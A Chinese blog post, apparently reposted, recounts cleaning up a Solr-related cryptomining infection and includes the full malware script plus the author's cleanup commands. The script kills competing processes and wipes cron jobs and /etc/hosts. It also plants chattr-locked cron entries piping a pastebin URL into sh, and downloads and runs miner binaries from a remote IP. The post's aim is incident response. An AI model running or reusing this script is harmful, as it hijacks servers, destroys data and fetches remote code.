2. 程式人生 > 其它 >記一次挖礦病毒solr

記一次挖礦病毒solr

阿新 發佈:2022-12-06

1 病毒出現

2  後來發現有個定時任務

3  去網址檢視

4 把這個指令碼拉下來

#!/bin/sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
ps aux | grep -v grep | grep 'givemexyz' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'dbuse' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'javaupDates' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
killall /tmp/*
killall /tmp/.*
killall /var/tmp/*
killall /var/tmp/.*
pgrep JavaUpdate | xargs -I % kill -9 %
pgrep kinsing | xargs -I % kill -9 %
pgrep donate | xargs -I % kill -9 %
pgrep kdevtmpfsi | xargs -I % kill -9 %
pgrep sysupdate | xargs -I % kill -9 %
pgrep mysqlserver | xargs -I % kill -9 %
chattr -ia /var/spool/cron/root
crontab -r
crontab -l | grep -e "xg546sAd" | grep -v grep
if [ $? -eq 0 ]; then
  echo "cron good"
else
  (
    crontab -l 2>/dev/null
    echo "*/5 * * * * curl -fsSL https://pastebin.com/raw/xg546sAd | sh"
  ) | crontab -
fi
rm -f /tmp/*
rm -f /tmp/.sola
s2=`whoami`
if [ `whoami` = "root" ];
then
    chattr -ia /etc/cron.d/*
    rm -rf /etc/cron.d/*
    chattr -i /var/spool/cron/crontabs/root
    chattr -i /usr/local/bin/dns
    rm -f /etc/cron.hourly/oanacroner
    rm -f /etc/cron.hourly/oanacrona
    rm -f /etc/cron.daily/oanacroner
    rm -f /etc/cron.daily/oanacrona
    rm -f /etc/cron.monthly/oanacroner
    rm -f /usr/local/bin/dns
    rm -f /etc/update.sh
    chattr -ia /etc/hosts
    echo >/etc/hosts
    chattr +ia /etc/hosts
    chattr -i /etc/sysupdate
    rm -f /etc/sysupdate
    rm -f /etc/config.json
    rm -f /var/tmp/kworkerds
    rm -f /usr/bin/.systemcero
    rm -f /usr/bin/cloudupdate
    rm -f /usr/bin/diskmanagerd
    rm -f /lib/libterminfo.so
    rm -f /bin/httpsntp
    rm -f /bin/ftpsntp
    rm -f /var/tmp/jspserv
    rm -f /usr/sbin/cron
    rm -f /usr/bin/kinsing*
    rm -f /etc/cron.d/kinsing*
    rm -f /usr/bin/node
    chattr -isa /var/spool/cron/*
    rm -rf /var/spool/cron/*
    chattr +isa /tmp/xms
    rm -f /var/tmp/kinsing
    chattr -ia /etc/crontab
    echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xg546sAd | sh' > /etc/crontab
    chattr +ia /etc/crontab
    chattr -ia /var/spool/cron/root
    chattr -ia /var/spool/cron/crontabs/root
    echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xg546sAd | bash' >/var/spool/cron/root
    echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xg546sAd | bash' >/var/spool/cron/crontabs/root
    echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xg546sAd | sh' > /etc/cron.d/root
    chattr +ia /var/spool/cron/root
    chattr +ia /etc/cron.d/root
    chattr +ia /var/spool/cron/crontabs/root
else
    ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|atlassian\|awk\|sbin\|WebLogic.sh\|solr\|server\|aux\|httpd\|sh\|sbin|' | grep ${s2:0:7} | awk '{print $2}' | xargs -I % kill -9 %
    ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|atlassian\|awk\|sbin\|WebLogic.sh\|solr\|server\|aux\|httpd\|sh\|defunct\|sbin|' | grep $s2 | awk '{print $2}' | xargs -I % kill -9 %
fi
chmod +777 /tmp/*
pkill networkservice
pkill networkser+
pkill watchbog
pkill xmrig
rm -rf /tmp/.solr
mkdir /tmp/.solr
p=$(ps auxf|grep solrd|awk '{if($3>=60.0) print $2}')
name=""$p
if [ -z "$name" ]
then
    pkill solr.sh
    pkill solrd
    ps aux | grep -v grep | grep -v 'java\|redis\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|confluence\|awk\|aux\|sh' | awk '{if($3>60.0) print $2}' | xargs -I % kill -9 %
    rm -rf /tmp/.solr
    mkdir /tmp/.solr
    chmod +rwx /tmp/.solr
    curl -fsSL http://45.144.3.216:10000/starrail/config/config.json -o /tmp/.solr/config.json
    curl -fsSL http://45.144.3.216:10000/starrail/cbt2zip/setup.exe -o /tmp/.solr/solrd
    curl -fsSL http://45.144.3.216:10000/solr.sh -o /tmp/.solr/solr.sh
    curl -fsSL http://45.144.3.216:10000/genshin -o /tmp/.solr/genshin
    chmod +x /tmp/.solr/genshin
    chmod +x /tmp/.solr/solrd
    chmod +x /tmp/.solr/solr.sh
    nohup /tmp/.solr/solr.sh &>>/dev/null &
    sleep 10
    rm -f /tmp/.solr/solr.sh
else
    exit
fi

  發現它在系統裡設定了5個定時任務,同時把排程任務檔案改成了可讀,另外在tmp目錄有個隱藏資料夾.solr

5 處理(它是10秒的排程週期,人工一個一個處理的話,很可能人工還沒處理完,另外的排程任務又把前面的定時任務補上了,所以改成指令碼批量處理)

 
 kill -9 11779
 kill -9 11773
 kill -9 11423
 kill -9 11507
 kill -9 11508
 
 rm -rf  /tmp/.solr
  
 chattr -ia /etc/crontab
 chattr -ia /var/spool/cron/root
 chattr -ia /var/spool/cron/crontabs/root
 chattr 
 
-ia /etc/cron.d/root
 chattr -ia /var/spool/cron/root
 
cat /dev/null  > /etc/crontab
cat /dev/null  > /var/spool/cron/root
cat /dev/null  > /var/spool/cron/crontabs/root
cat /dev/null  > /etc/cron.d/root
cat /dev/null  > /var/spool/cron/root

 
chattr +ia /etc/crontab
chattr +ia /var/spool/cron/root
chattr +ia /var/spool/cron/crontabs/root
chattr 
 
+ia /etc/cron.d/root
chattr +ia /var/spool/cron/root

先把病毒程序程序都kill, 再把宿主資料夾都刪除,再把定時任務的可讀屬性開啟,批量清空,再把可讀屬性加回去,,後續伺服器安全性加強以後再改回去, 另外有別的定時任務記得先儲存

相關推薦

病毒solr

1 病毒出現 2  後來發現有個定時任務 3  去網址檢視 4 把這個指令碼拉下來 #!/bin/sh

伺服器中病毒

參考部落格:https://blog.csdn.net/daiyuhe/article/details/95683393 學習redis的時候,開放了6379埠,因為校園網的原因,不能訪問,所以就修改為了另一個埠,過了幾個小時,阿里雲頻繁給我發簡訊,我說因攻擊被限

入侵處理記錄(2021.01.27)

https://github.com/bg6cq/ITTS/blob/master/security/mine/README.md 轉自上面連結,也是我的親身經歷,供大家學習。網路安全大家引以為戒。愛鬧的小兄弟們,別鬧了啊,讓張老師花了好幾天的心思在你們弄得事情

(虛假的應急響應)我雲伺服器中了病毒kdevtmpfsi的經歷

1、話說在我10.16號搭建solr復現CVE-2020-13957的時候,為了圖省事直接在我的vps本地搭建了一下。

pwnrige病毒

# 今天一個客戶反應他的網站很慢, # 於是登陸他伺服器發現cpu被拉滿, # 可能就是中了的毒

因為“”而被查水錶

事件過程 上圖是昨天資訊中心的老師個我發的訊息,說我的機器有虛擬貨幣的行為,恰逢國家政策打壓的風口,這方面管得比較嚴,所以老師讓我查下是啥情況

木馬的較量---linux下的

木馬的較量 聚銘網路  2022-02-22 10:51:18 78105 1 、概述 本文主要是記錄了針對程式的應急響應處理,從三個部分來解讀此次事件:

伺服器被處理過程!

伺服器被處理過程 首先利用watch -n 1 nvidia-smi 命令檢視GPU程序時發現幾張顯示卡佔用率都是100%

洞經驗 | 曲折的Getshell過程

最近在某框架的漏洞,其中枚Getshell,的過程有點曲折感覺可以寫篇文章總結一下,方便與各位大牛交流交流。

洞經驗 | 針對Twitter(Periscope)API 的有趣洞經歷

近期,我在Twitter的Periscope服務中發現了一個漏洞。這是一個CSRF(跨站請求偽造)漏洞,雖然這個漏洞並不算是高危漏洞,但是發現該漏洞的整個過程我認為是非常值得跟大家分享的。

使用 Arthas 熱更新線上程式碼(誤)

起因 在一次迭代中,出現了一個低階錯誤,if 語句中的判斷邏輯出現了錯誤,剛好這個功能場景在開發和測試過程中很少觸發,使用的使用者也不多,不過的確影響到了少部分使用者,所以還是需要進行修復。

OOM問題排查過程

這周生產環境出了久違的java.lang.OutOfMemoryError: Java heap space,花了些時間找了下原因,記錄分享一下 ?

Apple Watch App 開發經歷

前言: 隨著現在 Apple 生態圈的發展,越來越多的 App 會把自己的簡化版從 iOS 遷移至 WatchOS(支付寶、微信、手Q、頭條、QQ音樂、網易雲音樂等等,都有Watch版App)。

ELK+FileBeats搭建

獲取ElasticSearch+LogStash+Kibana+FileBeats 關於elk搭建的全部產品都可以從elastic的官方網站獲取最新版本elastic官網

Spring @Transactional失效的排查過程

問題 壓力測試時發現生成了相同的序號,根據日誌分析發現select ... for update沒有鎖住某一行的資料,從而導致序號重複

"記憶體洩露"排查過程

問題的發現 今天發現線上一個應用記憶體佔用非常高,但它的cpu使用率卻很低

JVM指令重排引起的執行緒問題

問題 多個執行緒同時讀一個HashMap,有條執行緒會定時獲取最新的資料,構建新的HashMap並將舊的引用指向新的HashMap,這是種類似CopyOnWrite(寫時複製)的寫法,主要程式碼如下,在不要求資料實時更新(容忍資料不是最新

golang程式CPU高的排查過程

前言 事情的起因是某天CTO突然和我說,生產環境的程式CPU有點高,關鍵是現在也沒什麼負載,同樣的程式碼在開發環境上CPU就低的多了。

基於Docker的效能測試

一句話結論 對於跑在單核CPU上的運算類API,根據業務需求(最大響應時間)來除錯找到最大執行緒數,然後依據執行緒數除錯出heap大小(主要看年老代的回收次數)

資料庫冷熱分離

前言 最近在家小公司實習,文章也沒怎麼更新。前兩天參與了後臺系統資料庫冷熱分離(一期)的工作,雖然只是參與了定時任務和介面的開發改造,但還是想了解一下它的前因後果,畢竟作為隻鹹魚,就要有翻身之後再作